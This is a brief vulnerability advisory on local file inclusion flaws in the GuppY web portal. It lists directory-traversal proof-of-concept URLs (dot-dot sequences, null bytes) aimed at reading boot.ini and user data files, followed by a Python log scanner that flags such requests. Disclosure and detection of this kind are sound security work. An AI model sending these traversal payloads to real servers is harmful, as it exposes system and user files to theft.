GuppY Multiple Local File Include and Information Disclosure Vulnerabilities

An exploit is not required.

The following proof-of-concept examples are available:
http://www.example.com/[path_to_guppy]/admin/editorTypetool.php?cmd=DIR&meskin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F

http://www.example.com/[path_to_guppy]/admin/inc/archbatch.php?lng=../../../../../../../../../../../boot.ini%00

http://www.example.com/[path_to_guppy]/admin/inc/dbbatch.php?lng=../../../../../../../../../../../

http://www.example.com/[path_to_guppy]/admin/inc/dbbatch.php?lng=../../../../../../../../../../../boot.ini%00

http://www.example.com/[path_to_guppy]/admin/inc/nwlmail.php?lng=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00

http://www.example.com/[path_to_guppy]/admin/inc/archbatch.php?lng=../../data/usermsg/username.dtb%00
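
One way to find requests like the ones above in web server access logs, added here as an example (it is not part of the original advisory or of GuppY's code). The script and parameter names come from the URLs above; the combined log format, the /guppy/ install path, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameter pairs, taken from the proof-of-concept URLs on this page.
WATCHED = {
    "admin/editortypetool.php": "meskin",
    "admin/inc/archbatch.php": "lng",
    "admin/inc/dbbatch.php": "lng",
    "admin/inc/nwlmail.php": "lng",
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_value(value):
    """List the reasons a decoded parameter value looks like path traversal."""
    reasons = []
    if ".." in value.replace("\\", "/").split("/"):
        reasons.append("dot-dot segment")
    if "\x00" in value:
        reasons.append("null byte")
    return reasons

def scan_line(line):
    """Return (script, param, reasons) for a flagged log line, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    path = url.path.lower()  # compare script names case-insensitively
    for script, param in WATCHED.items():
        if not path.endswith("/" + script):
            continue
        # parse_qsl percent-decodes once, so %2F becomes "/" and %00 becomes NUL.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            reasons = suspicious_value(value) if key == param else []
            if reasons:
                return (script, param, reasons)
    return None

# Constructed sample lines in combined log format, not from a real server.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2010:10:00:00 +0000] "GET /guppy/admin/inc/dbbatch.php?lng=../../../boot.ini%00 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2010:10:00:05 +0000] "GET /guppy/admin/editorTypetool.php?cmd=DIR&meskin=..%2F..%2F HTTP/1.1" 200 900',
    '203.0.113.9 - - [01/Jan/2010:10:01:00 +0000] "GET /guppy/admin/inc/nwlmail.php?lng=en HTTP/1.1" 200 300',
    '203.0.113.9 - - [01/Jan/2010:10:02:00 +0000] "GET /guppy/index.php?lng=fr HTTP/1.1" 200 4000',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(scan_line(line))
```

The check decodes the query string once, so a doubly encoded value would need a second decoding pass before matching.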


 

Copyright 2010, SecurityFocus